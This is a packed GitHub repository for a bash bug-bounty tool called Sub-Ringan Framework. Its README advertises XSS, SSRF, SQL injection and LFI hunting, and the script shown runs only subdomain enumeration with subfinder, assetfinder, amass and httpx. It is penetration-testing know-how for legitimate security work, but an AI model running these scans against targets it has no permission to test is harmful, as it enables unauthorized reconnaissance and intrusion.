├── LICENSE
├── README.md
├── Sub-ringan-Framwork.pdf
├── Sub-ringan
    ├── Screenshot from 2024-06-25 07-09-36.png
    ├── Sub-Ringan.sh
    ├── km_20230806-1_1440p_30f_20230806_215451.mp4
    ├── logo.png
    ├── requirements.txt
    └── setup.sh
└── Verified-project-GPCSSI.pdf


/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2023 Dev Vijay cw-129
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | # Sub-Ringan-Framework 🔍
  2 | Tool for automate bughunting process 🍭.
  3 | 
  4 | ![Picsart_23-08-08_22-03-01-814](https://github.com/DevVj-1/Sub-Ringan-Framework/assets/106962581/a00e8f43-2d20-43ea-922e-c8cc3da42fd7)
  5 | 
  6 | 
  7 | <p align="left"> <img src="https://komarev.com/ghpvc/?username=DevVj-1&label=👁%20views%20%20&color=0e75b6&style=flat" alt="DevVj-1" /> </p>
  8 | 
  9 | by Dev Vijay CW-129 june 2024
 10 | 
 11 | Presenting the Sub-Ringan Framework, a user-friendly bug hunting tool designed to automate the process of identifying vulnerabilities in web applications. This tool is created specifically for bug bounty hunters and cybersecurity experts, By automating much of the work, it allows testers to focus on uncovering critical vulnerabilities and improving web application security.
 12 | > Key Features 💀:
 13 | 
 14 | > Subdomain  Discovery from everywhere including many websites-db ☁:
 15 | Quickly identify all subdomains associated with your target, providing you with a comprehensive overview.
 16 | 
 17 | > Fetch every live 🕷 URL from every assets,subs,webs-db 🕸:
 18 | Find and then Scan live URLs for potential vulnerabilities, ensuring thorough coverage of your target's web presence.
 19 | 
 20 | > XSS (Cross-Site Scripting) Detection all 👑 Reflected parameters with inbuild and customizable polyglot payload 🦄: 
 21 | Uncover XSS vulnerabilities that could compromise user data and application security.
 22 | 
 23 | > One and only header base SSRF (Server-Side Request Forgery) 🔎 Detection:
 24 | Identify potential SSRF vulnerabilities that might lead to unauthorized data access.
 25 | 
 26 | > SQLi ( time base , header base SQL Injection) Analysis 🌈:
 27 | Detect SQL injection points and potential weaknesses in your target's database.
 28 | 
 29 | > LFI (Local File Inclusion) Search 👁:
 30 | Hunt for LFI vulnerabilities that could lead to unauthorized access to sensitive files.
 31 | 
 32 | 
 33 | # Efficient Organization:
 34 | Sub-Ringan Framework automatically arranges target files in a structured directory, enhancing your workflow and enabling seamless collaboration with fellow bug bounty hunters.
 35 | 
 36 | # Installation and pre-requirements for Sub-Ringan ⚜️ Framework:
 37 | 
 38 | >> Required 🛐 Dependencies:
 39 | 
 40 | > gf: A powerful pattern-matching utility for extracting URLs and other useful information from web pages. 
 41 | ```
 42 | Install it from: https://github.com/tomnomnom/gf
 43 | ```
 44 | > httpx: A fast and multi-purpose HTTP utility. 
 45 | ```
 46 | Install it from: https://github.com/projectdiscovery/httpx
 47 | ```
 48 | > tee: A command-line utility for redirecting output to multiple files. It's usually available by default on most Unix-like systems.
 49 | 
 50 | 
 51 | > assetfinder: A tool to discover assets from a domain.
 52 | ```
 53 | Install it from: https://github.com/tomnomnom/assetfinder
 54 | ```
 55 | > getallurls: A tool to fetch all URLs from a web page.
 56 | ```
 57 | Install it from: https://github.com/lc/gau
 58 | ```
 59 | > waybackurls: A tool to fetch URLs from the Wayback Machine. 
 60 | ```
 61 | Install it from: https://github.com/tomnomnom/waybackurls
 62 | ```
 63 | > gxss: A tool for finding reflected parameters. 
 64 | ```
 65 | Install it from: https://github.com/KathanP19/Gxss
 66 | ```
 67 | > anew: A tool for filtering and manipulating text output.
 68 | ```
 69 | Install it from: https://github.com/tomnomnom/anew
 70 | ```
 71 | ![Picsart_23-08-08_22-08-30-090](https://github.com/DevVj-1/Sub-Ringan-Framework/assets/106962581/e048d639-2bb5-4818-a754-64b2165944c6)
 72 | 
 73 | # Installation ✅ Steps:
 74 | 
 75 | ### 1. Clone the Sub-Ringan Framework repository from GitHub:
 76 | 
 77 | ```
 78 | git clone https://github.com/DevVj-1/Sub-Ringan-Framework.git
 79 | ```
 80 | ### 2. Navigate to the Sub-Ringan Framework directory:
 81 | ```
 82 | cd  Sub-Ringan Framework 
 83 | chmod +x Sub-Ringan.sh
 84 | sh Sub-Ringan.sh
 85 | ```
 86 | ### 3. Make sure all the required dependencies are installed and available in your system
 87 | 
 88 | ##  Click on this Image to Watch YouTube Video
 89 | 
 90 | [![YouTube Video](https://img.youtube.com/vi/19MVxXFJxwc/0.jpg)](https://www.youtube.com/watch?v=19MVxXFJxwc)
 91 | 
 92 | > Interface 1 💧
 93 | 
 94 |  ![kmc_20230810_133924](https://github.com/DevVj-1/Sub-Ringan-Framework/assets/106962581/28457274-f181-4d73-be61-1570c5f3e17a)
 95 | 
 96 | 
 97 | > Interface 2 🔥
 98 | 
 99 | ![kmc_20230810_133827](https://github.com/DevVj-1/Sub-Ringan-Framework/assets/106962581/e3d4c193-5830-488b-b9cd-1b6d248d3a3d)
100 | 
101 | 
102 | > Interface 3 ☘️
103 | 
104 | ![kmc_20230810_133854](https://github.com/DevVj-1/Sub-Ringan-Framework/assets/106962581/e169d552-3c1b-4848-8fce-b9d2b552cc25)
105 | 
106 | 🙌 Special Thanks to the Awesome Tools that Power Sub-Ringan Framework! 🙌
107 | 
108 | - **gf**: Rohan Aggarwal (@rohank1337)
109 | - **sqlmap**: Bernardo Damele A. G. (@MiroslavStampar)
110 | - **amass**: Jeff Foley (@caffix)
111 | - **subfinder**: Ice3man (@Ice3man543)
112 | - **ffuf**: Magnus Stubman (@ffuf)
113 | - **httpx**, **qsreplace**, **getallurls**, **waybackurls**, **gxss** ,**anew**, **asset finder** : Tom Hudson (@tomnomnom)
114 | 
115 | Kudos to these talented individuals for their invaluable contributions! 🌟
116 | 
117 | - **Sub-Ringan-Framework**:  is  not just relying on other tools – it brings some fresh techniques to the table, like header-based SSRF detection 🔍 and an inbuilt polyglot XSS payload. 
118 | and detect time based⏳ SQL injection with temper bypass  technique
119 | It's not just a wrapper for other programs.
120 | 
121 | ## License
122 | 
123 | This project is licensed under the MIT License. See [LICENSE](LICENSE) for details.
124 | 
125 | 
126 | 


--------------------------------------------------------------------------------
/Sub-ringan-Framwork.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/DevVj-1/Sub-Ringan-Framework/d5d3d1303c3a661165f1c45315bf2e2cc549c66e/Sub-ringan-Framwork.pdf


--------------------------------------------------------------------------------
/Sub-ringan/Screenshot from 2024-06-25 07-09-36.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/DevVj-1/Sub-Ringan-Framework/d5d3d1303c3a661165f1c45315bf2e2cc549c66e/Sub-ringan/Screenshot from 2024-06-25 07-09-36.png


--------------------------------------------------------------------------------
/Sub-ringan/Sub-Ringan.sh:
--------------------------------------------------------------------------------
  1 | #!/bin/bash
  2 | 
  3 | Target() 
  4 | {
  5 | # Set target domain
  6 | echo  "\033[0;31m[*]\033[0;32m Enter the Domain NAME: "
  7 | read target_domain
  8 | echo "\033[0;31m-------------------------------------------------\033[0;33m "
  9 | mkdir $target_domain
 10 | cd $target_domain
 11 | pwd
 12 | echo "\033[0;31m-------------------------------------------------\033[0;33m "
 13 | ls
 14 | }
 15 | 
 16 | echo "\e[5;1;31m⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣀⣤⣴⣶⣶⣶⣶⣦⣤⣀⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀
 17 | ⠀⠀⠀⠀⠀⠀⣠⣴⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣦⣄⠀⠀⠀⠀⠀⠀
 18 | ⠀⠀⠀⠀⣠⣾⣿⣿⣿⣿⣿⣿⣿⠏⠁⠀⢶⣿⣿⣿⣿⣿⣿⣿⣷⣄⠀⠀⠀⠀
 19 | ⠀⠀⢀⣾⣿⣿⣿⣿⣿⣿⡿⠿⣿⠀⠀⠀⠀⣿⠿⢿⣿⣿⣿⣿⣿⣿⣷⡀⠀⠀
 20 | ⠀⢠⣾⣿⣿⣿⣿⣿⡿⠋⣠⣴⣿⣷⣤⣤⣾⣿⣦⣄⠙⢿⣿⣿⣿⣿⣿⣷⡄⠀
 21 | ⠀⣼⣿⣿⣿⣿⣿⡏⢀⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⡀⢹⣿⣿⣿⣿⣿⣧⠀
 22 | ⢰⣿⣿⣿⣿⣿⡿⠀⣾⣿⣿⣿⣿⠟⠉⠉⠻⣿⣿⣿⣿⣷⠀⢿⣿⣿⣿⣿⣿⡆
 23 | ⢸⣿⣿⣿⣿⣿⣇⣰⣿⣿⣿⣿⡇⠀⠀⠀⠀⢸⣿⣿⣿⣿⣆⣸⣿⣿⣿⣿⣿⡇
 24 | ⠸⣿⣿⣿⡿⣿⠟⠋⠙⠻⣿⣿⣿⣦⣀⣀⣴⣿⣿⣿⣿⠛⠙⠻⣿⣿⣿⣿⣿⠇
 25 | ⠀⢻⣿⣿⣧⠉⠀⠀⠀⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠀⠈⣿⣿⣿⡟⠀
 26 | ⠀⠘⢿⣿⣿⣷⣦⣤⣴⣾⠛⠻⢿⣿⣿⣿⣿⡿⠟⠋⣿⣦⣤⠀⣰⣿⣿⡿⠃⠀
 27 | ⠀⠀⠈⢿⣿⣿⣿⣿⣿⣿⣷⣶⣤⣄⣈⣁⣠⣤⣶⣾⣿⣿⣷⣾⣿⣿⡿⠁⠀⠀
 28 | ⠀⠀⠀⠀⠙⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠋⠀⠀⠀⠀
 29 | ⠀⠀⠀⠀⠀⠀⠙⠻⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠟⠋⠀⠀⠀⠀⠀⠀
 30 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠉⠛⠻⠿⠿⠿⠿⠟⠛⠉⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀"
 31 | echo "\e[0m\033[1;33m       >--->> Sub-Ringan Framework V0.15 <<---<  "
 32 | echo "\033[1;35m
 33 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⣀⣀⣀⣠⣼⠀⠀⠀⠀⠈⠙⡆⢤⠀⠀⠀⠀⠀⣷⣄⣀⣀⣀⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
 34 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣤⣴⣾⣿⣿⣿⣿⣿⣿⡿⢿⡷⡆⠀⣵⣶⣿⣾⣷⣸⣄⠀⠀⠀⢰⠾⡿⢿⣿⣿⣿⣿⣿⣿⣷⣦⣤⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
 35 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣴⣾⣿⣿⣿⣿⣽⣿⣿⣿⣿⡟⠀⠀⠀⠀⣾⣿⣿⣿⣿⣿⣿⣿⣄⠀⠀⠀⠀⠀⠀⢹⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣦⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
 36 | ⠀⠀⠀⠀⠀⠀⠀⠀⢀⡾⣻⣵⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠁⠀⠀⠀⠐⣻⣿⣿⡏⢹⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠈⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣮⣟⢷⡀⠀⠀⠀⠀⠀⠀⠀⠀
 37 | ⠀⠀⠀⠀⠀⠀⢀⣴⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⢿⣿⣿⣿⡄⠀⠀⠀⠀⢻⣿⣿⣷⡌⠸⣿⣾⢿⡧⠀⠀⠀⠀⠀⢀⣿⣿⣿⡿⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣦⡀⠀⠀⠀⠀⠀⠀
 38 | ⠀⠀⠀⠀⠀⣠⣾⡿⢛⣵⣾⣿⣿⣿⣿⣿⣯⣾⣿⣿⣿⣿⣧⠀⠀⠀⠀⠀⢻⣿⣿⣿⣶⣌⠙⠋⠁⠀⠀⠀⠀⠀⣼⣿⣿⣿⣿⣷⣽⣿⣿⣿⣿⣿⣷⣮⡙⢿⣿⣆⠀⠀⠀⠀⠀
 39 | ⠀⠀⠀⠀⣰⡿⢋⣴⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡟⣿⣿⣿⣿⣧⡀⠀⠀⠀⣠⣽⣿⣿⣿⣿⣷⣦⡀⠀⠀⠀⢀⣼⣿⣿⣿⣿⠻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣦⣝⢿⣇⠀⠀⠀⠀
 40 | ⠀⠀⠀⣴⣯⣴⣿⣿⠿⢿⣿⣿⣿⣿⣿⣿⡿⢫⣾⣿⣿⣿⣿⣿⣿⡦⢀⣼⣿⣿⣿⣿⣿⣿⣿⣿⣿⣦⡀⢴⣿⣿⣿⣿⣿⣿⣷⣝⢿⣿⣿⣿⣿⣿⣿⡿⠿⣿⣿⣧⣽⣦⠀⠀⠀
 41 | ⠀⠀⣼⣿⣿⣿⠟⢁⣴⣿⡿⢿⣿⣿⡿⠛⣰⣿⠟⣻⣿⣿⣿⣿⣿⣿⣿⡿⠿⠋⢿⣿⣿⣿⣿⣿⠻⢿⣿⣿⣿⣿⣿⣿⣿⣟⠻⣿⣆⠙⢿⣿⣿⡿⢿⣿⣦⡈⠻⣿⣿⣿⣧⠀⠀
 42 | ⠀⡼⣻⣿⡟⢁⣴⡿⠋⠁⢀⣼⣿⠟⠁⣰⣿⠁⢰⣿⣿⣿⡿⣿⣿⣿⠿⠀⣠⣤⣾⣿⣿⣿⣿⣿⠀⠀⠽⣿⣿⣿⢿⣿⣿⣿⡆⠈⢿⣆⠀⠻⣿⣧⡀⠈⠙⢿⣦⡈⠻⣿⣟⢧⠀
 43 | ⠀⣱⣿⠋⢠⡾⠋⠀⢀⣠⡾⠟⠁⠀⢀⣿⠟⠀⢸⣿⠙⣿⠀⠈⢿⠏⠀⣾⣿⠛⣻⣿⣿⣿⣿⣯⣤⠀⠀⠹⡿⠁⠀⣿⠏⣿⡇⠀⠹⣿⡄⠀⠈⠻⢷⣄⡀⠀⠙⢷⣄⠙⣿⣎⠂
 44 | ⢠⣿⠏⠀⣏⢀⣠⠴⠛⠉⠀⠀⠀⠀⠈⠁⠀⠀⠀⠛⠀⠈⠀⠀⠀⠀⠈⢿⣿⣼⣿⣿⣿⣿⢿⣿⣿⣶⠀⠀⠀⠀⠀⠁⠀⠛⠀⠀⠀⠀⠁⠀⠀⠀⠀⠉⠛⠦⣄⣀⣹⠀⠹⣿⡄
 45 | ⣼⡟⠀⣼⣿⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⠛⠛⠛⠋⠁⠀⢹⣿⣿⠆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠙⢿⣧⠀⢻⣷
 46 | ⣿⠃⢰⡟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣰⣶⣦⣤⠀⠀⣿⡿⠆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢻⡆⠘⣿
 47 | ⣿⠀⢸⠇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣾⡟⠁⠈⢻⣷⣸⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣧⠀⣿
 48 | ⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢿⣷⣀⣀⣸⣿⡿⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠀⣿
 49 | ⢸⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⠛⣿⡿⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢰⡇
 50 | ⠈⠇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣼⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠸⠁
 51 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⡇⠀⢀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
 52 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⢷⣴⡿⣷⠀⠀⢰⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
 53 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠴⡿⣟⣿⣿⣶⡶⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀"
 54 | echo "\033[2;33mAuthor of this Framework:\e[5;31m DEV VIJAY\e[0m 🇮🇳"
 55 | echo "Github : \033[1;35m(https://github.com/DevVj-1 ) "
 56 | echo "Linkedin : \033[1;32m(https://www.linkedin.com/in/dev-vj1/ )"
 57 | echo "Instagram :\033[1;34m(https://www.instagram.com/dev_vj1/ )"
 58 | echo "\033[1;31m-------------------------------------------------\033[0;33m "
 59 | echo "\033[1;33m{~} Let's Start digging into Target website 🔍 --> 🍭" 
 60 | echo "\033[0;31m-------------------------------------------------\033[0;33m "
 61 | echo "\033[0;33m          Welcome to BugHunter's Heaven!"
 62 | echo "Sub-Ringan Tool be like!, What you want from me 🤣 "
 63 | echo "\033[0;31m-------------------------------------------------\033[0;33m "
 64 | echo "[~] Choose any one option"
 65 | echo "\033[1;31m[+] Subdomain Hunting        [1]"
 66 | echo "\033[1;35m[+] URL Hunting              [2]"
 67 | echo "\033[1;32m[+] XSS Hunting              [3]"
 68 | echo "\033[1;34m[+] LFI Hunting              [4]"
 69 | echo "\033[1;33m[+] Ssrf Hunting             [5]"
 70 | echo "\033[1;31m[+] SQLi Hunting             [6]\033[1;33m"
 71 | echo "\033[1;31m-------------------------------------------------\033[1;33m "
 72 | 
 73 | read -p "[*] Enter your choice (1-6): " choice 
 74 | case $choice in
 75 | 1)
 76 | echo "\033[0;31m-------------------------------------------------\033[1;33m "
 77 | echo "\033[0;33mSubdomain Hunting \e[5;1;95m"
 78 | echo "⠀⠀⠀⠀⠀⠀⠀⠀⠀⡎⠀⣴⠏⢠⢀⠾⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⡞⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢰⠉⢷⡈⢣⡀⠀⢸⡇⠀⠀⠀
 79 | ⠀⠀⠀⠀⠀⠀⠀⢰⢃⡼⠃⠀⣸⠸⠀⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⡿⢻⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⠀⠀⢸⠀⠀⠙⣦⡿⣦⡀⢇⠀⠀⠀
 80 | ⠀⠀⢠⠀⠀⠀⠀⢸⡿⠁⠀⠀⡷⡇⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⢰⣿⣀⣈⣿⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡇⠀⠀⢸⣷⠀⠀⠈⠻⣿⣷⣼⣦⡀⠀
 81 | ⠂⠀⡜⠷⣄⣀⠀⠈⠁⠀⠀⢀⡇⣧⣠⣷⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠉⠉⠙⠛⠛⠛⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡄⠀⠀⠀⢸⠃⠀⢀⡈⣿⣆⠀⠀⠀⠈⢻⣯⡷⠳⢤
 82 | ⠀⠀⢹⡀⡇⠈⠏⠓⠒⠤⣄⣸⠇⡏⠉⠙⠛⠶⢤⣄⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⠞⠁⢀⣀⣤⡿⠖⠛⠉⠀⣸⠙⢦⠤⠴⢶⠋⢹⠀⡄⠀
 83 | ⠀⠀⠀⣷⡇⢰⠀⠀⠀⠀⠀⠈⠀⠙⠿⣶⣶⡤⢤⣄⣈⣻⣿⡛⠓⠲⠶⠤⢤⣤⣤⣤⣤⣤⣤⣤⣤⣤⣤⠤⠤⠴⢿⣯⡴⣛⣉⣉⣤⣤⠤⠶⠒⠛⠉⠀⠀⠀⠀⠹⠀⣸⡜⠀⠀
 84 | ⠀⠀⢠⠞⡇⢸⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠙⠳⢴⣦⣄⣉⠀⠉⠉⠛⠓⠒⠲⣶⠶⠦⠤⠴⠤⠶⣤⠶⠶⠒⠒⠚⠋⢉⣩⣿⢉⡿⠥⢄⡀⠀⠀⠀⠀⠀⠀⠀⠀⡀⢀⡟⠀⠀⠀
 85 | ⠇⣰⠋⠀⣿⢸⠀⠀⠀⠀⠀⠀⢀⣀⠤⠴⠒⠒⠀⠈⠙⠺⢽⣒⠤⣄⣀⠀⠀⠸⡀⠀⠀⠀⠀⢰⠃⠀⠀⣀⣠⣶⡺⠟⠋⠀⡿⡇⠀⠀⠈⠙⠲⣄⡀⠀⠀⠀⠀⡇⢸⠀⠀⠀⠀
 86 | ⡇⡇⠀⢸⠹⣾⠀⠀⠀⠀⠀⠀⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢻⡓⠢⠭⣿⠞⠁⠀⠀⠀⠀⠿⠒⣮⠿⠟⣋⡥⠴⠶⣶⣾⣿⣿⣿⠋⠉⠉⠉⣿⠟⠀⠀⠀⠀⣧⣶⡀⠰⡀⠀
 87 | ⣧⢱⡀⠘⣄⣿⠀⠀⠀⠀⠀⠀⠻⠶⠦⣤⣀⣀⣀⣀⣀⣀⣠⠄⣴⣿⣠⡀⠳⡄⠀⠀⠀⠀⠀⢠⡴⠁⠀⢿⣅⡀⠀⠀⠙⠿⠿⠿⠋⢀⣀⡤⠚⠁⠀⠀⠀⠀⠀⣿⢁⡗⢀⡇⢰
 88 | ⣿⣧⠹⣄⢘⡿⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣠⠤⠶⠞⣻⣟⡉⠤⠾⠁⠀⠀⠀⠀⠀⡟⠑⠲⢷⣾⣿⣿⣯⣍⣉⣻⣙⡏⠉⠁⠀⠀⠀⠀⠀⠀⠀⠀⢸⣯⠞⠀⡜⢀⣾
 89 | ⣿⣽⣧⡈⠻⠁⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠁⠀⠀⠀⠀⠀⠐⠀⠀⠀⢠⡇⠀⠀⠀⠀⠉⠑⠉⠉⠉⢹⢙⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⢿⣀⡞⠀⣾⣿
 90 | ⠋⣀⣼⣷⡀⠀⢧⠀⠀⢐⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣴⣾⣿⣿⣿⣿⣦⣄⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⠀⠉⢀⣾⠿⢿
 91 | ⣾⠟⠋⠀⣷⠶⢺⣧⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣶⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣦⣀⠀⠀⠀⠀⠀⢰⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡞⠀⢀⣾⠻⣷⣤
 92 | ⡏⠀⠀⢀⡇⢰⠀⣿⣷⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣤⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣤⣀⠀⠀⢸⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣼⢧⣤⡞⠁⠀⠙⢯
 93 | ⡇⠀⠀⣾⠇⣿⠀⢸⣿⣿⣦⣄⡀⠀⠀⠀⠀⣀⣠⣤⣶⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣶⣾⣽⡀⠀⠀⠀⠀⠀⢀⣀⣴⣿⡿⠀⣿⡀⠀⠀⠀⠀
 94 | ⡇⣀⣰⡿⢠⣿⡆⠀⢿⣿⣿⣿⣿⣷⣶⣶⣿⣿⣿⣿⣿⣿⡿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣶⣶⣶⣿⣿⣿⣿⣿⠇⠀⢿⣷⣄⡀⠀⠀
 95 | ⣿⣿⣿⣧⣿⣿⡇⠀⠸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⢠⣿⢸⣿⣿⡿⣿⠿"
 96 | echo "\e[0m\033[0;31m-------------------------------------------------\033[0;33m "
 97 | 
 98 | Target
 99 | echo "\033[0;31m-------------------------------------------------\033[1;33m "
100 | 
101 | 
102 | # Define output file for  subdomains
103 | echo  "\033[0;31m[*] \033[0;32m Enter the Output File name [\033[0;31m Example:subdomain.txt\033[0;32m]: "
104 | read output_file 
105 | 
106 | # Use Subfinder to find subdomains  and append to output file 
107 | echo "\033[0;32m[*]\033[0;32m  subfinder Processing..."
108 | subfinder -d $target_domain -v | tee -a $output_file 
109 | 
110 | # Use Assetfinder to find subdomains and append to output file
111 | echo "\033[1;35m[*]\033[0;32m  Assetfinder Processing..."
112 | assetfinder --subs-only $target_domain -v | tee -a $output_file 
113 | 
114 | # Use Amass to find Subdomains and save to output file
115 | echo "\033[1;32m[+]\033[0;32m NOTE: \033[0;35m Amass \033[0;32m take's some time to find domains! ໒(⊙ᴗ⊙)७✎▤  "
116 | echo "\033[1;32m[*]\033[0;35m Amass Processing..."
117 | amass enum -passive -d $target_domain --silent | tee -a  $output_file
118 | cat $output_file >> subdomain_takeover_targets.txt 
119 | 
120 | echo "\033[0;32m[+]\033[0;31m Finding \033[0;32mlive-Subdomains\033[0;31m and save it to a file! " 
121 | cat $output_file | httpx -silent -t 100     | anew  $output_file
122 | cat $output_file | sed -i 's/http:\/\///g'  | anew  $output_file
123 | cat $output_file | sed -i 's/https:\/\///g'     | anew $output_file
